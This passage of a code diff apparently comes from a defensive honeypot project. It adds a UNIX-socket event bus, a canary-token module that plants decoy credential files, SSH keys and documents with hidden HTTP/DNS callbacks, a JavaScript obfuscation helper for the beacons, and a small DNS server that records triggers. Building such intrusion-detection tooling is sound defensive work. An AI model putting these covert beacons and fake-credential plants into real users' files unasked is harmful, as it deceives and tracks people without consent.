            log.debug("bus.server: %s disconnected: %s", conn.peer_name, exc)
        except Exception:  # pragma: no cover - defensive
            log.exception("bus.server: unhandled error in connection")
        finally:
            await self._close_connection(conn)
            self._connections.discard(conn)
            writer_task.cancel()
            with contextlib.suppress(asyncio.CancelledError):
                await writer_task
    async def _reader_loop(
        self, conn: _Connection, reader: asyncio.StreamReader,
    ) -> None:
        while True:
            frame = await protocol.read_frame(reader)
            if frame is None:
                return
            await self._dispatch(conn, frame)
            if frame.verb == protocol.BYE:
                return
    async def _dispatch(self, conn: _Connection, frame: protocol.Frame) -> None:
        if frame.verb == protocol.HELLO:
            conn.peer_name = frame.args or conn.peer_name
            log.debug("bus.server: HELLO from %s", conn.peer_name)
            return
        if frame.verb == protocol.SUB:
            pattern = frame.args
            if not pattern:
                raise protocol.ProtocolError("SUB requires a pattern")
            conn.patterns.add(pattern)
            log.debug("bus.server: %s SUB %s", conn.peer_name, pattern)
            return
        if frame.verb == protocol.UNSUB:
            conn.patterns.discard(frame.args)
            return
        if frame.verb == protocol.PUB:
            topic = frame.args
            if not topic:
                raise protocol.ProtocolError("PUB requires a topic")
            data = protocol.decode_body(frame.body) if frame.body else {}
            event = Event(
                topic=topic,
                payload=data.get("payload", {}) or {},
                type=data.get("type", "") or "",
            )
            self._fanout(event, origin=conn)
            return
        if frame.verb == protocol.BYE:
            return
        # EVT is server-to-client only; receiving one is a protocol violation.
        raise protocol.ProtocolError(f"unexpected verb {frame.verb!r} from client")
    def _fanout(self, event: Event, *, origin: _Connection | None = None) -> None:
        """Enqueue *event* as an EVT frame on every matching connection.
        We do NOT deliver back to the originating connection (a publisher
        does not receive its own event).  Encoding happens once per event,
        not once per subscriber.
        """
        try:
            frame_bytes = protocol.encode(
                protocol.EVT, args=event.topic, body=event.to_dict(),
            )
        except protocol.ProtocolError:
            log.exception("bus.server: failed to encode EVT for topic=%s", event.topic)
            return
        for conn in self._connections:
            if conn is origin or conn.closed:
                continue
            if not any(matches(p, event.topic) for p in conn.patterns):
                continue
            _enqueue_drop_oldest(conn.outbound, frame_bytes, event.topic)
    async def _writer_loop(self, conn: _Connection) -> None:
        """Serialize writes onto *conn*'s socket.
        One writer task per connection so a slow peer only blocks its own
        queue, not the fan-out loop.  The queue is bounded with drop-oldest
        policy applied at enqueue time (see :func:`_enqueue_drop_oldest`).
        """
        try:
            while not conn.closed:
                data = await conn.outbound.get()
                conn.writer.write(data)
                await conn.writer.drain()
        except (ConnectionError, BrokenPipeError):
            log.debug("bus.server: %s writer: peer closed", conn.peer_name)
        except asyncio.CancelledError:
            pass
        except Exception:  # pragma: no cover - defensive
            log.exception("bus.server: writer loop crashed for %s", conn.peer_name)
    async def _close_connection(self, conn: _Connection) -> None:
        if conn.closed:
            return
        conn.closed = True
        with contextlib.suppress(Exception):
            conn.writer.close()
            await conn.writer.wait_closed()
 # ─── Helpers ─────────────────────────────────────────────────────────────────
 def _chmod_and_chown(path: pathlib.Path, mode: int, group: str | None) -> None:
    """Apply socket file perms and best-effort group ownership.
    If *group* is ``None`` or the named group does not exist, we leave the
    socket owned by the current process group.  This keeps the server
    usable on dev boxes that don't have a ``decnet`` group set up.
    """
    try:
        os.chmod(path, mode)
    except OSError as exc:
        log.warning("bus.server: chmod(%s, %o) failed: %s", path, mode, exc)
    if not group:
        return
    try:
        gid = grp.getgrnam(group).gr_gid
    except KeyError:
        log.debug("bus.server: group %r not found, leaving socket group unchanged", group)
        return
    try:
        os.chown(path, -1, gid)
    except PermissionError:
        # Dev box running as an unprivileged user can't chown.  Log once at
        # debug and move on — the socket is still usable by the owner.
        log.debug("bus.server: chown(%s, gid=%d) denied; leaving as-is", path, gid)
    except OSError as exc:
        log.warning("bus.server: chown(%s, gid=%d) failed: %s", path, gid, exc)
 def _enqueue_drop_oldest(
    queue: "asyncio.Queue[bytes]", data: bytes, topic: str,
 ) -> None:
    """Drop-oldest backpressure — mirrors :func:`decnet.bus.fake._enqueue_drop_oldest`."""
    while True:
        try:
            queue.put_nowait(data)
            return
        except asyncio.QueueFull:
            try:
                queue.get_nowait()
                log.warning("bus.server: subscriber queue full, dropped event topic=%s", topic)
            except asyncio.QueueEmpty:
                return
--- a/decnet/bus/worker.py
+++ b/decnet/bus/worker.py
@@ -0,0 +1,122 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """``decnet bus`` worker entrypoint.
 Starts a :class:`~decnet.bus.unix_server.BusServer` on the configured UNIX
 socket and serves forever, emitting a ``system.bus.health`` heartbeat on
 its own bus every :data:`HEARTBEAT_INTERVAL_SEC` seconds so liveness-aware
 consumers (dashboards, watchdogs) can tell the bus is up without polling
 the filesystem.
 Cross-host federation is **out of scope** for the MVP; each host runs its
 own bus independently.  See DEBT-029 for the deferred ``--bridge-tcp``
 mode that would proxy the socket over the swarm mTLS channel.
 """
 from __future__ import annotations
 import asyncio
 import os
 import pathlib
 import signal
 import time
 from decnet.bus import topics
 from decnet.bus.unix_server import BusServer
 from decnet.logging import get_logger
 log = get_logger("bus.worker")
 HEARTBEAT_INTERVAL_SEC = 10
 async def bus_worker(
    socket_path: str | pathlib.Path,
    *,
    group: str | None = "decnet",
    heartbeat_interval: int = HEARTBEAT_INTERVAL_SEC,
 ) -> None:
    """Run the bus server until cancelled or SIGTERM/SIGINT is received.
    The parent directory of *socket_path* must already exist (systemd's
    ``RuntimeDirectory=decnet`` handles this in prod; dev code is expected
    to ``mkdir`` first).  This function does not create it implicitly
    because the right choice of perms/owner depends on the deployment
    context.
    """
    path = pathlib.Path(socket_path)
    _ensure_parent(path)
    server = BusServer(path, group=group)
    await server.start()
    log.info("bus.worker: pid=%d socket=%s", os.getpid(), path)
    stop_event = asyncio.Event()
    _install_signal_handlers(stop_event)
    heartbeat_task = asyncio.create_task(_heartbeat_loop(server, heartbeat_interval))
    serve_task = asyncio.create_task(server.serve_forever())
    try:
        await stop_event.wait()
        log.info("bus.worker: shutdown signal received")
    finally:
        heartbeat_task.cancel()
        serve_task.cancel()
        for task in (heartbeat_task, serve_task):
            try:
                await task
            except (asyncio.CancelledError, Exception):  # noqa: BLE001 - draining shutdown
                pass
        await server.close()
        log.info("bus.worker: stopped")
 async def _heartbeat_loop(server: BusServer, interval: int) -> None:
    """Publish ``system.bus.health`` on the server's own fan-out."""
    started_at = time.time()
    while True:
        try:
            await server.publish(
                topics.system(topics.SYSTEM_BUS_HEALTH),
                {
                    "pid": os.getpid(),
                    "uptime_sec": round(time.time() - started_at, 3),
                    "ts": time.time(),
                },
                event_type=topics.SYSTEM_BUS_HEALTH,
            )
        except Exception:  # pragma: no cover - heartbeat must never kill the worker
            log.exception("bus.worker: heartbeat publish failed")
        await asyncio.sleep(interval)
 def _install_signal_handlers(stop_event: asyncio.Event) -> None:
    loop = asyncio.get_running_loop()
    for sig in (signal.SIGTERM, signal.SIGINT):
        try:
            loop.add_signal_handler(sig, stop_event.set)
        except (NotImplementedError, RuntimeError):
            # add_signal_handler is not supported on Windows / in some
            # test harnesses where the loop is running in a non-main thread.
            # The worker still exits via KeyboardInterrupt bubbling up.
            pass
 def _ensure_parent(path: pathlib.Path) -> None:
    parent = path.parent
    if parent.exists():
        return
    # Dev-box convenience: if the parent is the user's ``~/.decnet`` dir,
    # create it.  We do not auto-mkdir ``/run/decnet`` — that's systemd's job
    # and silently creating it as the wrong user would cause permission
    # confusion later.
    home_prefix = pathlib.Path.home() / ".decnet"
    try:
        parent.relative_to(home_prefix.parent)
    except ValueError:
        raise FileNotFoundError(
            f"bus socket parent {parent} does not exist; create it first"
        )
    parent.mkdir(parents=True, exist_ok=True)
 __all__ = ["bus_worker", "HEARTBEAT_INTERVAL_SEC"]
--- a/decnet/canary/init.py
+++ b/decnet/canary/init.py
@@ -0,0 +1,38 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """Canary tokens — decoy artifacts planted in decky filesystems.
 Public surface is exported here so callers can ``from decnet.canary
 import CanaryArtifact, get_generator, get_instrumenter`` without
 knowing the submodule layout.  Concrete generators / instrumenters
 live under :mod:`decnet.canary.generators` and
 :mod:`decnet.canary.instrumenters` respectively; the factory keeps
 import-time cost down by deferring those imports until first use
 (same pattern as :mod:`decnet.intel.factory`).
 """
 from __future__ import annotations
 from decnet.canary.base import (
    CanaryArtifact,
    CanaryContext,
    CanaryGenerator,
    CanaryInstrumenter,
 )
 from decnet.canary.factory import (
    KNOWN_GENERATORS,
    KNOWN_INSTRUMENTERS,
    get_generator,
    get_instrumenter,
    pick_instrumenter_for_mime,
 )
 __all__ = [
    "CanaryArtifact",
    "CanaryContext",
    "CanaryGenerator",
    "CanaryInstrumenter",
    "KNOWN_GENERATORS",
    "KNOWN_INSTRUMENTERS",
    "get_generator",
    "get_instrumenter",
    "pick_instrumenter_for_mime",
 ]
--- a/decnet/canary/_obfuscate_helper.js
+++ b/decnet/canary/_obfuscate_helper.js
@@ -0,0 +1,19 @@
 // SPDX-License-Identifier: AGPL-3.0-or-later
 // Node helper invoked by decnet.canary.obfuscator.
 // Reads {code, options} JSON from stdin, writes obfuscated JS to stdout.
 // Kept dependency-light on purpose: only javascript-obfuscator.
 const JsObf = require('javascript-obfuscator');
 let raw = '';
 process.stdin.setEncoding('utf8');
 process.stdin.on('data', (chunk) => { raw += chunk; });
 process.stdin.on('end', () => {
  try {
    const { code, options } = JSON.parse(raw);
    const result = JsObf.obfuscate(code, options || {});
    process.stdout.write(result.getObfuscatedCode());
  } catch (e) {
    process.stderr.write(String(e && e.stack || e));
    process.exit(2);
  }
 });
--- a/decnet/canary/base.py
+++ b/decnet/canary/base.py
@@ -0,0 +1,152 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """Canary generator / instrumenter ABCs and the artifact dataclass.
 Two flavors of producer share the same return shape:
 * :class:`CanaryGenerator` synthesises a fake artifact from scratch
  (e.g. a plausible ``~/.aws/credentials`` block, a ``.git/config``
  pointing at an attacker-bait remote URL).  Operators don't supply
  any input.
 * :class:`CanaryInstrumenter` mutates an operator-uploaded blob to
  embed the callback (HTTP slug + DNS host).  The original blob bytes
  are passed in; the instrumenter returns the mutated version.
 Both return a :class:`CanaryArtifact` — the planter doesn't care
 which path produced it.  Same dataclass keeps the planter's
 docker-exec injector trivial.
 ABCs intentionally do not include I/O — generators and instrumenters
 are pure functions of (slug, host, blob?).  All filesystem work
 happens in :mod:`decnet.canary.planter` and :mod:`decnet.canary.storage`.
 """
 from __future__ import annotations
 from abc import ABC, abstractmethod
 from dataclasses import dataclass, field
 from typing import Optional
@dataclass
 class CanaryContext:
    """Inputs every generator/instrumenter needs to embed a working callback.
    ``callback_token`` is the unique slug; it appears verbatim in HTTP
    URLs (``https://<host>/c/<callback_token>``) and as the leftmost
    DNS label (``<callback_token>.canary.<dns_zone>``) so a single
    slug resolves to a single :class:`CanaryToken` row regardless of
    which path the attacker tripped.
    ``http_base`` and ``dns_zone`` come from the canary worker's
    public-facing config (``DECNET_CANARY_HTTP_BASE``,
    ``DECNET_CANARY_DNS_ZONE``).  When DNS isn't deployed,
    ``dns_zone`` is empty and instrumenters that only have a DNS
    surface (e.g. an artifact whose only realistic embed point is a
    hostname) raise.
    """
    callback_token: str
    http_base: str  # e.g. "https://canary.example.test" — no trailing slash
    dns_zone: str = ""  # e.g. "canary.example.test"; "" disables DNS embeds
    persona: str = "linux"  # "linux" | "windows" — drives default username, path style
@dataclass
 class CanaryArtifact:
    """Bytes-and-placement bundle produced by a generator/instrumenter."""
    path: str
    """Absolute path inside the target container."""
    content: bytes
    """Final bytes that hit the decky filesystem.
    Always raw bytes — the planter base64-encodes for the wire so
    binary blobs (DOCX/PNG/PDF) survive ``docker exec sh -c`` safely.
    """
    mode: int = 0o600
    """Unix file mode.  Defaults to ``0600`` because most realistic
    canary placements (``~/.aws/credentials``, ``.env``, ``id_rsa``)
    are operator-only.  Honeydocs in user docs folders should pass
    ``0o644``.
    """
    mtime_offset: int = 0
    """Seconds relative to *now* for the planted file's mtime.
    Negative values backdate the file so it doesn't look like it
    appeared the moment the decky was deployed.  ``-86400 * 90`` (90
    days ago) is a common choice for ``honeydoc`` artifacts; ``0``
    means "stamp it now," which is fine for ``aws_creds``-like files
    that would plausibly be touched recently.
    """
    instrumenter: Optional[str] = None
    """Identifier of the instrumenter that produced this artifact (for
    upload-driven tokens).  Mirrored into ``CanaryToken.instrumenter``.
    Mutually exclusive with :attr:`generator`.
    """
    generator: Optional[str] = None
    """Identifier of the generator that produced this artifact (for
    synthesised tokens).  Mirrored into ``CanaryToken.generator``.
    Mutually exclusive with :attr:`instrumenter`.
    """
    notes: list[str] = field(default_factory=list)
    """Human-readable notes about the embedding (e.g. "DOCX: injected
    1×1 remote image at relsId rId99").  Surfaced in the API
    ``preview`` response so the operator sees what we did before
    planting.  Never leaked to the attacker-facing surface.
    """
    fingerprint_nonce: Optional[str] = None
    """Per-mint HMAC nonce for fingerprint canaries; ``None`` for everything
    else.  Cultivator reads this and persists it on ``CanaryToken.fingerprint_nonce``
    so the worker can validate incoming ``?k=`` params.
    """
 class CanaryGenerator(ABC):
    """Produces a fake artifact from scratch."""
    name: str  #: short tag — matches ``CanaryToken.generator``
    @abstractmethod
    def generate(self, ctx: CanaryContext) -> CanaryArtifact:
        """Synthesise the artifact.
        MUST NOT do I/O.  MUST be deterministic for the same
        ``(callback_token, http_base, dns_zone, persona)`` so re-seeding
        from :attr:`CanaryToken.secret_seed` produces byte-identical
        output and the planter is naturally idempotent.
        """
 class CanaryInstrumenter(ABC):
    """Mutates an operator-uploaded blob to embed a callback."""
    name: str  #: short tag — matches ``CanaryToken.instrumenter``
    #: MIME prefixes this instrumenter handles.  The factory uses these
    #: to dispatch by sniffed content-type.  Sub-string match against
    #: the prefix list (e.g. ``("application/pdf",)`` or
    #: ``("text/",)``).
    mime_prefixes: tuple[str, ...] = ()
    @abstractmethod
    def instrument(
        self, blob: bytes, ctx: CanaryContext, *, target_path: str,
    ) -> CanaryArtifact:
        """Return the mutated bytes with the callback embedded.
        MUST raise :class:`InstrumenterRejectedError` when the blob
        can't be safely mutated (corrupt zip, encrypted PDF, etc.) so
        the API can surface a 400 with the specific reason rather than
        silently shipping the original bytes.
        """
 class InstrumenterRejectedError(ValueError):
    """Raised when an instrumenter can't safely mutate the input."""
--- a/decnet/canary/cultivator.py
+++ b/decnet/canary/cultivator.py
@@ -0,0 +1,193 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """Realism contract adapter for canary generators.
 Stage 7 of the realism migration.  The orchestrator's planner picks a
 ``canary_*`` :class:`~decnet.realism.taxonomy.ContentClass` 1–3% of
 the time on file ticks; this module turns that pick into a
 :class:`~decnet.canary.base.CanaryArtifact` (bytes the SSH driver
 plants) plus a persisted :class:`~decnet.web.db.models.CanaryToken`
 row so the canary worker recognises the slug when an attacker trips
 it.
 What this is NOT: it doesn't pick *when* canaries fire — that's the
 realism planner's job.  It doesn't decide *where* on the filesystem
 the canary lands beyond what realism naming + persona conventions
 already produce.  It's a thin bytes-and-row factory bolted onto the
 realism contract.
 Stealth (per ``feedback_stealth.md``): we never leak the
 ``DECNET`` literal into anything that survives to the planted file.
 The underlying generators are already stealth-clean; this wrapper
 must not undo that.
 """
 from __future__ import annotations
 import os
 import secrets as _secrets
 from datetime import datetime, timezone
 from typing import Any, Optional
 from decnet.canary.base import CanaryArtifact, CanaryContext
 from decnet.canary.factory import get_generator
 from decnet.logging import get_logger
 from decnet.realism.personas import login_for
 from decnet.realism.taxonomy import ContentClass, Plan
 log = get_logger("canary.cultivator")
 # realism content_class → canary generator name.  Mirrors
 # :data:`decnet.canary.factory.KNOWN_GENERATORS`.
 _CLASS_TO_GENERATOR: dict[ContentClass, str] = {
    ContentClass.CANARY_AWS_CREDS: "aws_creds",
    ContentClass.CANARY_ENV_FILE: "env_file",
    ContentClass.CANARY_GIT_CONFIG: "git_config",
    ContentClass.CANARY_SSH_KEY: "ssh_key",
    ContentClass.CANARY_HONEYDOC: "honeydoc",
    ContentClass.CANARY_HONEYDOC_DOCX: "honeydoc_docx",
    ContentClass.CANARY_HONEYDOC_PDF: "honeydoc_pdf",
    ContentClass.CANARY_MYSQL_DUMP: "mysql_dump",
    ContentClass.CANARY_FINGERPRINT_HTML: "fingerprint_html",
    ContentClass.CANARY_FINGERPRINT_SVG: "fingerprint_svg",
 }
 # Generator → CanaryKind. The trip surface (HTTP slug callback / DNS
 # resolution / passive bait) determines how the canary worker matches
 # an attacker callback to this token. Aligned with
 # :data:`decnet.web.db.models.canary.CanaryKind`.
 _GENERATOR_TO_KIND: dict[str, str] = {
    "aws_creds": "aws_passive",   # no embedded callback; passive bait
    "env_file": "http",
    "git_config": "http",
    "honeydoc": "http",
    "honeydoc_docx": "http",
    "honeydoc_pdf": "http",
    "ssh_key": "dns",             # trip is DNS resolution of host comment
    "mysql_dump": "dns",          # trip is DNS resolution of subdomain
    "fingerprint_html": "http",   # obfuscated JS beacons GET /c/<slug>
    "fingerprint_svg": "http",    # same, embedded inside SVG <script>
 }
 # Path conventions per generator.  The realism planner doesn't know
 # about decoy-realistic credential locations (``~/.aws/credentials``,
 # ``~/.git/config``); we map them per-class here so the planted
 # artifact lands somewhere an attacker would actually look.
 _DEFAULT_PATH: dict[ContentClass, str] = {
    ContentClass.CANARY_AWS_CREDS: "/home/{persona}/.aws/credentials",
    ContentClass.CANARY_ENV_FILE: "/home/{persona}/app/.env",
    ContentClass.CANARY_GIT_CONFIG: "/home/{persona}/.git/config",
    ContentClass.CANARY_SSH_KEY: "/home/{persona}/.ssh/id_rsa",
    ContentClass.CANARY_HONEYDOC: "/home/{persona}/Documents/notes.html",
    ContentClass.CANARY_HONEYDOC_DOCX: "/home/{persona}/Documents/Q3-Operations-Review.docx",
    ContentClass.CANARY_HONEYDOC_PDF: "/home/{persona}/Documents/Q3-Operations-Review.pdf",
    ContentClass.CANARY_MYSQL_DUMP: "/var/backups/db_backup.sql",
    ContentClass.CANARY_FINGERPRINT_HTML: "/home/{persona}/Documents/asset_directory.html",
    ContentClass.CANARY_FINGERPRINT_SVG: "/home/{persona}/Documents/network_topology.svg",
 }
 def _path_for(plan: Plan) -> str:
    """Produce the canary placement path for *plan*.
    The realism planner already filled in ``plan.target_path`` from
    the namer, but canary placements have stronger conventions
    (``~/.aws/credentials``, ``~/.ssh/id_rsa``) than the realism
    namer's vocabulary.  When :data:`_DEFAULT_PATH` has an entry,
    that wins.
    """
    template = _DEFAULT_PATH.get(plan.content_class)
    if template is None:
        return plan.target_path
    return template.format(persona=login_for(plan.persona))
 def _new_callback_token() -> str:
    """16 url-safe bytes — same shape canary slug fields use elsewhere."""
    return _secrets.token_urlsafe(16)
 async def cultivate(
    plan: Plan,
    repo: Any,
    *,
    http_base: Optional[str] = None,
    dns_zone: Optional[str] = None,
    created_by: str = "system",
 ) -> CanaryArtifact:
    """Realism-driven canary plant.
    Build a :class:`CanaryContext`, ask the right generator for bytes,
    persist a ``canary_tokens`` row so the canary worker can attribute
    callbacks to this token, and return the artifact for the SSH
    driver to plant.
    *http_base* and *dns_zone* default to ``DECNET_CANARY_HTTP_BASE``
    and ``DECNET_CANARY_DNS_ZONE`` env vars respectively — same
    pattern the canary worker uses.  When both are empty, generators
    that need a callback host (``ssh_key`` DNS, ``mysql_dump``)
    raise; the planner's caller logs and falls back to a non-canary
    plan.
    """
    if not plan.content_class.is_canary():
        raise ValueError(
            f"cultivate() called with non-canary content_class="
            f"{plan.content_class!r}"
        )
    gen_name = _CLASS_TO_GENERATOR.get(plan.content_class)
    if gen_name is None:
        raise KeyError(
            f"no canary generator mapped for content_class="
            f"{plan.content_class!r}"
        )
    callback_token = _new_callback_token()
    http_base_str: str = http_base or os.environ.get("DECNET_CANARY_HTTP_BASE") or ""
    dns_zone_str: str = dns_zone or os.environ.get("DECNET_CANARY_DNS_ZONE") or ""
    ctx = CanaryContext(
        callback_token=callback_token,
        http_base=http_base_str,
        dns_zone=dns_zone_str,
        persona="linux",  # all our deckies are POSIX in MVP
    )
    generator = get_generator(gen_name)
    artifact = generator.generate(ctx)
    # The generator returns ``path=""`` (planter fills it normally).
    # We have a realism-derived path on hand; stuff it in for the SSH
    # driver's plant_file call AND the canary_tokens row.
    placement_path = _path_for(plan)
    # Persist the token row before planting so the canary worker can
    # attribute a callback if the artifact trips during the plant
    # itself (improbable but possible — DOCX viewers can preview
    # autoplay-style).
    token_data: dict = {
        "kind": _GENERATOR_TO_KIND.get(gen_name, "http"),
        "decky_name": plan.decky_name,
        "instrumenter": None,
        "generator": gen_name,
        "placement_path": placement_path,
        "callback_token": callback_token,
        "secret_seed": callback_token,  # deterministic re-seed compatible
        "placed_at": datetime.now(timezone.utc),
        "created_by": created_by,
        "state": "planted",
    }
    if artifact.fingerprint_nonce is not None:
        token_data["fingerprint_nonce"] = artifact.fingerprint_nonce
    await repo.create_canary_token(token_data)
    # Carry the placement_path on the artifact so the orchestrator's
    # plant_file call uses it.  We don't mutate the generator's
    # original — copy with the new path.
    return CanaryArtifact(
        path=placement_path,
        content=artifact.content,
        mode=artifact.mode,
        mtime_offset=artifact.mtime_offset,
        instrumenter=artifact.instrumenter,
        generator=artifact.generator,
        notes=list(artifact.notes),
    )
--- a/decnet/canary/dns_server.py
+++ b/decnet/canary/dns_server.py
@@ -0,0 +1,208 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """Minimal authoritative DNS server for canary tokens (stdlib only).
 We don't need a full resolver — only enough to:
 1. Decode an inbound query's qname.
 2. If the qname matches ``<slug>.<canary_zone>``, log the callback,
   publish ``canary.<token_id>.triggered`` on the bus, and return a
   plausible A record (any RFC-5737 reserved address would do; we
   use 192.0.2.1) so the attacker's resolver doesn't loop on
   NXDOMAIN.
 3. For unknown qnames return NXDOMAIN.
 DNS-over-UDP wire format is well-trodden: 12-byte header + name
 labels + qtype + qclass.  We implement just the bits we need.
 This module deliberately avoids the ``dnslib`` PyPI package so the
 canary worker has no extra dependency surface.  If we ever need
 EDNS0, DNSSEC, or other niceties we'll swap to dnslib then.
 """
 from __future__ import annotations
 import asyncio
 import struct
 from dataclasses import dataclass
 from typing import Awaitable, Callable, Optional, Tuple
@dataclass(frozen=True)
 class DNSQuery:
    """Decoded query — only the bits the canary worker cares about."""
    txid: int
    qname: str  # lowercase, no trailing dot
    qtype: int
    qclass: int
    flags: int
 def _decode_name(buf: bytes, offset: int) -> Tuple[str, int]:
    """Return ``(qname_lowercase_no_dot, bytes_consumed)``.
    Supports compressed pointers (RFC 1035 §4.1.4).  Doesn't recurse —
    we walk the pointer chain iteratively with a hop cap to avoid
    pointer-loop DoS.
    """
    labels: list[str] = []
    pos = offset
    consumed = 0
    jumped = False
    hops = 0
    while True:
        if pos >= len(buf):
            raise ValueError("truncated DNS name")
        length = buf[pos]
        if length == 0:
            pos += 1
            if not jumped:
                consumed = pos - offset
            break
        if (length & 0xC0) == 0xC0:
            # Compression pointer.
            if pos + 1 >= len(buf):
                raise ValueError("truncated DNS pointer")
            ptr = ((length & 0x3F) << 8) | buf[pos + 1]
            if not jumped:
                consumed = (pos + 2) - offset
            pos = ptr
            jumped = True
            hops += 1
            if hops > 10:
                raise ValueError("DNS pointer loop")
            continue
        pos += 1
        if pos + length > len(buf):
            raise ValueError("truncated DNS label")
        labels.append(buf[pos:pos + length].decode("ascii", "replace"))
        pos += length
    return ".".join(labels).lower(), consumed
 def parse_query(packet: bytes) -> DNSQuery:
    """Parse the (single) question of a DNS query packet."""
    if len(packet) < 12:
        raise ValueError("DNS packet too short")
    txid, flags, qdcount, _ancount, _nscount, _arcount = struct.unpack(
        "!HHHHHH", packet[:12]
    )
    if qdcount != 1:
        raise ValueError(f"expected 1 question, got {qdcount}")
    qname, consumed = _decode_name(packet, 12)
    pos = 12 + consumed
    if pos + 4 > len(packet):
        raise ValueError("truncated DNS qtype/qclass")
    qtype, qclass = struct.unpack("!HH", packet[pos:pos + 4])
    return DNSQuery(
        txid=txid, qname=qname, qtype=qtype, qclass=qclass, flags=flags,
    )
 def _encode_name(name: str) -> bytes:
    out = bytearray()
    for label in name.split("."):
        if not label:
            continue
        b = label.encode("ascii", "replace")
        out.append(len(b))
        out.extend(b)
    out.append(0)
    return bytes(out)
 def _build_response(
    query: DNSQuery,
    *,
    rcode: int = 0,
    answer_ip: Optional[str] = None,
 ) -> bytes:
    """Encode a DNS response packet.
    *rcode* 0 = NOERROR, 3 = NXDOMAIN.  When *answer_ip* is supplied
    and the query was for an A record we include exactly one answer
    (TTL 60, class IN).
    """
    qd_count = 1
    an_count = 1 if (answer_ip and query.qtype == 1 and rcode == 0) else 0
    flags = 0x8400 | rcode  # response + authoritative + RA bit clear + rcode
    header = struct.pack(
        "!HHHHHH", query.txid, flags, qd_count, an_count, 0, 0,
    )
    qname_bytes = _encode_name(query.qname)
    question = qname_bytes + struct.pack("!HH", query.qtype, query.qclass)
    answer = b""
    if an_count and answer_ip is not None:
        # Use a name pointer back to the question (offset 12).
        ptr = struct.pack("!H", 0xC000 | 12)
        rdata = bytes(int(o) for o in answer_ip.split("."))
        answer = ptr + struct.pack("!HHIH", 1, 1, 60, 4) + rdata
    return header + question + answer
 # Hook signature: receives the matched slug + the query; returns
 # nothing.  The worker uses it to persist a CanaryTrigger row and
 # publish the bus event.
 TriggerHook = Callable[[str, DNSQuery, str], Awaitable[None]]
 class CanaryDNSProtocol(asyncio.DatagramProtocol):
    """asyncio UDP server endpoint for canary DNS callbacks.
    Constructor takes the canary zone (``"canary.example.test"``) and
    a coroutine called when a query matches ``<slug>.<zone>``.  The
    hook runs in the event loop's task; we don't block the receive
    path on it.
    """
    def __init__(
        self,
        zone: str,
        hook: TriggerHook,
        *,
        answer_ip: str = "192.0.2.1",
    ) -> None:
        # Normalise: lowercase, no leading/trailing dot.
        self._zone = zone.lower().strip(".")
        self._suffix = "." + self._zone if self._zone else ""
        self._hook = hook
        self._answer_ip = answer_ip
        self._transport: Optional[asyncio.DatagramTransport] = None
    def connection_made(self, transport) -> None:
        self._transport = transport
    def datagram_received(
        self, data: bytes, addr: Tuple[str, int],
    ) -> None:
        try:
            query = parse_query(data)
        except ValueError:
            # Malformed query — drop silently.  Returning a FORMERR
            # would tip off the attacker that *something* is listening
            # on this port; the stealth posture (feedback_stealth)
            # prefers radio silence on parse errors.
            return
        slug = self._slug_for(query.qname)
        if slug is None:
            # Unknown name — NXDOMAIN.
            self._send(addr, _build_response(query, rcode=3))
            return
        # Known name — answer with our sinkhole IP, then fire the hook.
        self._send(addr, _build_response(query, answer_ip=self._answer_ip))
        asyncio.ensure_future(self._hook(slug, query, addr[0]))
    def _slug_for(self, qname: str) -> Optional[str]:
        if not self._zone or not qname.endswith(self._suffix):
            return None
        slug = qname[: -len(self._suffix)]
        # Single-label slug only; multi-label means the attacker is
        # querying a sub-resource we don't model.
        if not slug or "." in slug:
            return None
        return slug
    def _send(self, addr: Tuple[str, int], packet: bytes) -> None:
        if self._transport is not None:
            self._transport.sendto(packet, addr)
--- a/decnet/canary/factory.py
+++ b/decnet/canary/factory.py
@@ -0,0 +1,154 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """Generator and instrumenter factories.
 Same lazy-import pattern as :mod:`decnet.intel.factory` — concrete
 implementations stay un-imported until first use so importing
 :mod:`decnet.canary` from a CLI subcommand doesn't drag in
 ``pikepdf`` / ``python-docx`` / ``Pillow`` for callers that only
 need the model layer.
 """
 from __future__ import annotations
 from typing import Tuple
 from decnet.canary.base import CanaryGenerator, CanaryInstrumenter
 KNOWN_GENERATORS: Tuple[str, ...] = (
    "git_config",
    "env_file",
    "ssh_key",
    "aws_creds",
    "honeydoc",
    "honeydoc_docx",
    "honeydoc_pdf",
    "mysql_dump",
    "fingerprint_html",
    "fingerprint_svg",
 )
 KNOWN_INSTRUMENTERS: Tuple[str, ...] = (
    "docx",
    "xlsx",
    "pdf",
    "html",
    "image",
    "plain",
    "passthrough",
 )
 def get_generator(name: str) -> CanaryGenerator:
    """Return the generator registered under ``name``.
    Raises :class:`ValueError` for unknown names so a typo in the API
    request surfaces as a 400 rather than silently producing nothing.
    """
    if name == "git_config":
        from decnet.canary.generators.git_config import GitConfigGenerator
        return GitConfigGenerator()
    if name == "env_file":
        from decnet.canary.generators.env_file import EnvFileGenerator
        return EnvFileGenerator()
    if name == "ssh_key":
        from decnet.canary.generators.ssh_key import SSHKeyGenerator
        return SSHKeyGenerator()
    if name == "aws_creds":
        from decnet.canary.generators.aws_creds import AWSCredsGenerator
        return AWSCredsGenerator()
    if name == "honeydoc":
        from decnet.canary.generators.honeydoc import HoneydocGenerator
        return HoneydocGenerator()
    if name == "honeydoc_docx":
        from decnet.canary.generators.honeydoc_docx import HoneydocDocxGenerator
        return HoneydocDocxGenerator()
    if name == "honeydoc_pdf":
        from decnet.canary.generators.honeydoc_pdf import HoneydocPdfGenerator
        return HoneydocPdfGenerator()
    if name == "mysql_dump":
        from decnet.canary.generators.mysql_dump import MySQLDumpGenerator
        return MySQLDumpGenerator()
    if name == "fingerprint_html":
        from decnet.canary.generators.fingerprint_html import (
            FingerprintHtmlGenerator,
        )
        return FingerprintHtmlGenerator()
    if name == "fingerprint_svg":
        from decnet.canary.generators.fingerprint_svg import (
            FingerprintSvgGenerator,
        )
        return FingerprintSvgGenerator()
    raise ValueError(
        f"Unknown canary generator: {name!r}. Known: {KNOWN_GENERATORS}"
    )
 def get_instrumenter(name: str) -> CanaryInstrumenter:
    """Return the instrumenter registered under ``name``."""
    if name == "docx":
        from decnet.canary.instrumenters.docx import DocxInstrumenter
        return DocxInstrumenter()
    if name == "xlsx":
        from decnet.canary.instrumenters.xlsx import XlsxInstrumenter
        return XlsxInstrumenter()
    if name == "pdf":
        from decnet.canary.instrumenters.pdf import PdfInstrumenter
